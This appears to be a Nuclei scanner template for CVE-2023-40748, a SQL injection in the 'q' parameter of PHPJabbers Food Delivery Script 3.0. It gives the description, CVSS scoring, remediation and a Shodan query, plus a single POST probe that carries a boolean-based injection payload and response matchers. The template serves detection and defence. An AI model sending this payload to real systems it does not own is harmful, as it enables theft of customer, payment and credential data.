id: CVE-2023-40748 info: name: PHPJabbers Food Delivery Script - SQL Injection author: ritikchaddha severity: critical description: | PHPJabbers Food Delivery Script 3.0 has a SQL injection (SQLi) vulnerability in the "q" parameter of index.php. impact: | Unauthenticated attackers can exploit SQL injection in the q parameter to extract sensitive database information including customer orders, payment details, delivery addresses, and admin credentials from the Food Delivery platform. remediation: | Update PHPJabbers Food Delivery Script to a version newer than 3.0 that properly sanitizes the q parameter and uses parameterized queries. reference: - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f - https://nvd.nist.gov/vuln/detail/CVE-2023-40748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-40748 cwe-id: CWE-89 epss-score: 0.02881 epss-percentile: 0.85395 cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"PHPJabbers" vendor: phpjabbers product: food_delivery_script tags: cve,cve2023,phpjabbers,food-delivery,sqli,vuln,vkev http: - method: POST path: - "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d" matchers-condition: and matchers: - type: word part: body words: - "class pjAdminOrdersaction" - "didn't exists" condition: and - type: status status: - 200 # digest: 4a0a004730450221009bef190759aa38eaf048c7da8dc14b3f37b0548581e9facd1a40d248382cecb80220224fa3a67b0696778a4b758c8ff14c6e913f47049721f0f0d121de8534e65b3a:922c64590222798bb761d5b6d8e72950